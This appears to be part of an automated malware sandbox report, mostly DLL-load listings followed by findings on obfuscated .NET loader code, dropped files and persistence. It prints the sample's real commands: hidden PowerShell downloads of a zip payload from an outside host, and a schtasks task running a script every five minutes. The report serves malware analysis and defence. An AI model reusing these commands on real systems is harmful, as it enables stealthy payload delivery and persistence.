              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: shfolder.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: napinsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: pnrpnsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: wshbth.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: nlaapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: winrnr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifSection loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: aclayers.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sfc_os.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000028.00000000.3262451452.00000000004E2000.00000002.00000001.01000000.00000012.sdmp, RegAsm.exe.28.dr

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_1hDllwdT4WVgtLtvrh9HNTiswVDrK.eJw816nOtBnQZuwusfPwdeCqpzSPc,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._6VCrJCYx9STcmgqNj8H9Kfg3sUAts,_1hDllwdT4WVgtLtvrh9HNTiswVDrK._4JfBy5iKF4dHKJv3wpolEJW2Kc5aN,_1hDllwdT4WVgtLtvrh9HNTiswVDrK.fUOnaw45vUZW9wRtPzKDoSUr7wQOr,GKj04XVvJiEzT5.o4DomEaaAK3Tvn()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2],GKj04XVvJiEzT5.HW4WcRdB9jpgvy(GKj04XVvJiEzT5.LnW574bP2vfKev(B7gC3ws7qAtINRZuxsMLlEJhLdYgq[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { B7gC3ws7qAtINRZuxsMLlEJhLdYgq[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd System.AppDomain.Load(byte[])
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17 System.AppDomain.Load(byte[])
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.cs.Net Code: _8pCaSS8opbfEaqRaxA9VTdWhd8g17
              Suspicious powershell command line found
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,15_2_004062FC
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01008B75 push ecx; ret 28_2_01008B88
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FFCBDB push eax; retf 28_2_00FFCBF8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 36_2_00858B75 push ecx; ret 36_2_00858B88
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, OfpCuG0X22QLMT.csHigh entropy of concatenated method names: 'nYwX372KteT5t2', 'segcmNagSiz7hL', 'yb0jQST0YwMHe1', '_0RenYuPKc4bvZA', 'JZsQDAM9n6EtQO', 'nH0p3C37Fxk65v', 'wQuomVoWPHIdrS', 'KcyJvFgDlyg3yX', 'loFybsLcslp7YB', 'OqFzKE7yCCpgGL'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, kqeFvQIpnkai8I7JJTganEHGxWh1A.csHigh entropy of concatenated method names: 'aRwUsZ42Qp2Iu55HZmFMSXPDzzjZF', 'r9VwT22LhaEvtkx68iMROo7ndw3YZ', 'jrU22mrrq7mmJu6zwT9QAgvUnX9CJ', 'V9WvHsnCndciRvznYV6E8Iiw7Ijry', 'sGZ2ry3eOxX0Kx', 'yIBnpeSQWl0II9', 'xgpfXiKspkv7Qk', '_43XjyQXj7XyIa1', 'a89z5bafQjfyZs', 'Tk551t0Ool3k8m'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, GKj04XVvJiEzT5.csHigh entropy of concatenated method names: '_31TqwEG7d5XQHj', 'lxcCKU7qpJsmyP', 'YZYM9q6UFN8qLN', 'qbUFKJUwRHfrx0', 'yp447Ls9FeU2rB', 'v2qtSP4rX7Lk2T', '_913bZMPdi8gyo6', 'ub5OHWFnNsEeGb', 'J3wXGNI0TDWKm6', 'LnW574bP2vfKev'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 86FINuqvBzjCx79NWe0bWDD3Gktpm.csHigh entropy of concatenated method names: 'A8tvE0DZ8bvmGcdzUXcKpnPMdpDux', 'W2w4gwDiJR1Z2UwSx8jWJmGy2ytCd', 'ft4DTvZvc4qN6kRvp59xULzP1mvg8', 'h5DA5Rai9oL4jV2ulFHvRbWYSJygJ', 'O4KRgJLa3ckMhcPaD7WwIhODI7hWV', 'YWUQmw7KiGzjOEEcq4lQEbMvcLlhm', 'EJyK88GxspHTRmtV2qD89iF21FbSy', 'IhlkrpmLJYz1G6gP55j78Ej4gKn7F', 'm8302rRfONzkL3YJxiETt06WijQVn', 'P9l9FPyls55tddMfrIzTDmtDXAy1p'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, 75lcEdvWjHm39L5ktP3tlqVbSoumD.csHigh entropy of concatenated method names: 'GLV28Q7RWReL58LNXG4dRIdIK2TEN', 'SqFko7T9STuWHJvrJgezXiBwfKMUK', 'W4PVwXl8ze5GoIs5LD920v8iPvDpI', 'VuiMLbYUZ5mbwdX2kA30fKD2DAOuV', 'lkt0AxMEBI88hk7IoXbH4QyieI6eA', 'lfIrGorQseyo6qZGq1AaQGw9LAMH7', 'mMD8nCbTfzppkmkizs1ZJLk6b6GTh', 'NAsi31w08xZTNd4EnIYvztAjeNjfl', 'dwTlKIVNZIbv7CCltiTquHRE8Fbjk', 'NAmq1jGo4CTjwh'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, JbeTyT6ozehDZJ.csHigh entropy of concatenated method names: '_4qRRAkWwEHf3Zd', 'vRsh53PpGgdqA0', '_8Hq2Or18riYaIv', '_8mRH3Hyg3XD8u5', 'EdcUKUZTwxyIgi', '_6vgoIitpz9FToY', 'kF9NScHwDxQCcQ', 'ebBHLsDcmu1A20', 'sfMOP7twzn5TxB', 'TEyNm0Eygu7184'
              Source: 28.3.Carter.pif.3c63cf0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.csHigh entropy of concatenated method names: '_2mGh5CdvITFqIEgkpZMeXEYaYAyDB', '_9BeG36XnpwBXeXYTPZ4EKlMNJsvBQ', 'nZq2XPd9g1M2B2LsBPHPhOcwls9uQ', 'IXpGxkIWH8t4eoPAyitkJLIMPKWb6', 'w266axfymAlJYlHxOy7UD7CgTETRm', 'ImNQKUnqPr9jIMbbRrVqiJBKaucLC', 'hvtupL1aknPiuTNtO4sMyUTjVVlCG', 'LuqfnAbPcScBSkmye7C3NBjgwO957', 'qHF4AT3e2DvOntMCkk5fkm78V3UET', 'CLYFb0PcaLLnKDeZTkE3vmfjdeJfz'

              Persistence and Installation Behavior

              barindex
              Drops PE files with a suspicious file extension
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\220239\Carter.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrJump to dropped file
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\220239\Carter.pifJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifFile created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeJump to dropped file
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url
              Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
